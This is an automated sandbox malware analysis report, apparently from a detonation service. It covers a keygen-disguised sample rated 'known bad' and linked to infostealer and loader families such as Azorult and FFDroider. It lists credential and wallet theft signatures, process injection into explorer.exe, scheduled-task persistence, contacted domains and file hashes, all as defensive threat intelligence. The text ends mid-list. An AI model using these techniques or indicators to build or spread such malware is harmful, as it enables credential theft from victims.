Malware Analysis Report

2024-11-13 16:52

Sample ID 241108-2bysta1dng
Target 813d32b014bcf87216f8af360cdf257ccdbc2080f9dbd0924fe40753d0b84f46
SHA256 813d32b014bcf87216f8af360cdf257ccdbc2080f9dbd0924fe40753d0b84f46
Tags
discovery azorult infostealer trojan fabookie ffdroider gcleaner onlylogger evasion loader spyware stealer privateloader pony collection credential_access rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

813d32b014bcf87216f8af360cdf257ccdbc2080f9dbd0924fe40753d0b84f46

Threat Level: Known bad

The file 813d32b014bcf87216f8af360cdf257ccdbc2080f9dbd0924fe40753d0b84f46 was found to be: Known bad.

Malicious Activity Summary

discovery azorult infostealer trojan fabookie ffdroider gcleaner onlylogger evasion loader spyware stealer privateloader pony collection credential_access rat

Ffdroider family

Pony,Fareit

Fabookie family

Detect Fabookie payload

PrivateLoader

FFDroider payload

Azorult family

Gcleaner family

Pony family

OnlyLogger

Onlylogger family

FFDroider

Fabookie

GCleaner

Privateloader family

Azorult

OnlyLogger payload

Deletes itself

Unsecured Credentials: Credentials In Files

Reads data files stored by FTP clients

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Reads user/profile data of web browsers

Accesses cryptocurrency files/wallets, possible credential harvesting

Accesses Microsoft Outlook profiles

Accesses Microsoft Outlook accounts

Looks up external IP address via web service

Checks installed software on the system

Checks whether UAC is enabled

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Drops file in Windows directory

Program crash

Unsigned PE

System Location Discovery: System Language Discovery

System Network Configuration Discovery: Internet Connection Discovery

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

outlook_win_path

Modifies system certificate store

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: CmdExeWriteProcessMemorySpam

Checks SCSI registry key(s)

Runs ping.exe

Suspicious use of SetWindowsHookEx

Uses Task Scheduler COM API

Scheduled Task/Job: Scheduled Task

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-08 22:25

Signatures

Azorult family

azorult

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-08 22:25

Reported

2024-11-08 22:27

Platform

win10v2004-20241007-en

Max time kernel

96s

Max time network

139s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 107.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-08 22:25

Reported

2024-11-08 22:27

Platform

win7-20240903-en

Max time kernel

117s

Max time network

118s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe"

Signatures

Azorult

trojan infostealer azorult

Azorult family

azorult

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 kvaka.li udp
US 8.8.8.8:53 kvaka.li udp

Files

memory/2396-0-0x0000000000400000-0x0000000000420000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-08 22:25

Reported

2024-11-08 22:27

Platform

win10v2004-20241007-en

Max time kernel

93s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe"

Signatures

Azorult

trojan infostealer azorult

Azorult family

azorult

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 kvaka.li udp
US 8.8.8.8:53 kvaka.li udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 67.208.201.84.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp

Files

memory/1832-0-0x0000000000400000-0x0000000000420000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-11-08 22:25

Reported

2024-11-08 22:27

Platform

win7-20241023-en

Max time kernel

117s

Max time network

117s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe"

Signatures

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\winnetdriv.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\winnetdriv.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2604 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 2604 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 2604 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 2604 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe"

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe" 1731104711 0

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.wpdsfds23x.com udp

Files

memory/2604-1-0x0000000000400000-0x00000000004E5000-memory.dmp

C:\Windows\winnetdriv.exe

MD5 265cadde82b0c66dc39ad2d9ee800754
SHA1 2e9604eade6951d5a5b4a44bee1281e32166f395
SHA256 40fd6a0b671a0e5074a206201f57f7731a0d01baab5874b28a9b0f019a451c5a
SHA512 c99f3a5464e1ac02402814401c2cb66a9fafb794356395c1081bdf3c4c3534086498c19efe4055780a52a1bb80db81658c2cb4af5271015af51edf7bd3865e7b

Analysis: behavioral8

Detonation Overview

Submitted

2024-11-08 22:25

Reported

2024-11-08 22:27

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

FFDroider

stealer ffdroider

FFDroider payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

Ffdroider family

ffdroider

GCleaner

loader gcleaner

Gcleaner family

gcleaner

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\services64.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4312 set thread context of 3864 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4628 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 4628 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 4628 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 1156 wrote to memory of 4264 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 1156 wrote to memory of 4264 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 1156 wrote to memory of 4264 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 4628 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe
PID 4628 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe
PID 4628 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe
PID 840 wrote to memory of 3968 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\chrome3.exe
PID 840 wrote to memory of 3968 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\chrome3.exe
PID 840 wrote to memory of 1524 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
PID 840 wrote to memory of 1524 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
PID 840 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\2.exe
PID 840 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\2.exe
PID 840 wrote to memory of 4580 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 840 wrote to memory of 4580 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 840 wrote to memory of 4580 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 840 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
PID 840 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
PID 4628 wrote to memory of 3496 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe
PID 4628 wrote to memory of 3496 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe
PID 4628 wrote to memory of 3496 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe
PID 3968 wrote to memory of 3188 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Windows\System32\cmd.exe
PID 3968 wrote to memory of 3188 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Windows\System32\cmd.exe
PID 3188 wrote to memory of 4788 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3188 wrote to memory of 4788 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3968 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Users\Admin\AppData\Roaming\services64.exe
PID 3968 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe C:\Users\Admin\AppData\Roaming\services64.exe
PID 4628 wrote to memory of 5016 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe
PID 4628 wrote to memory of 5016 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe
PID 4628 wrote to memory of 5016 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe
PID 4628 wrote to memory of 4328 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe
PID 4628 wrote to memory of 4328 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe
PID 4628 wrote to memory of 4808 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe
PID 4628 wrote to memory of 4808 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe
PID 4628 wrote to memory of 4808 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe
PID 4312 wrote to memory of 2228 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\System32\cmd.exe
PID 4312 wrote to memory of 2228 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\System32\cmd.exe
PID 4312 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
PID 4312 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
PID 2228 wrote to memory of 1388 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2228 wrote to memory of 1388 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4312 wrote to memory of 3864 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4312 wrote to memory of 3864 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4312 wrote to memory of 3864 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4312 wrote to memory of 3864 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4312 wrote to memory of 3864 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4312 wrote to memory of 3864 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4312 wrote to memory of 3864 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4312 wrote to memory of 3864 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4312 wrote to memory of 3864 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4312 wrote to memory of 3864 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4312 wrote to memory of 3864 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4312 wrote to memory of 3864 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4312 wrote to memory of 3864 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4312 wrote to memory of 3864 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe
PID 4312 wrote to memory of 3864 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe" -a

C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe"

C:\Users\Admin\AppData\Local\Temp\chrome3.exe

"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe

"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe"

C:\Users\Admin\AppData\Local\Temp\2.exe

"C:\Users\Admin\AppData\Local\Temp\2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4580 -ip 4580

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 788

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4580 -ip 4580

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 796

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4580 -ip 4580

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 824

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4580 -ip 4580

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 916

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4580 -ip 4580

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4580 -s 704

C:\Windows\SysWOW64\WerFault.exe

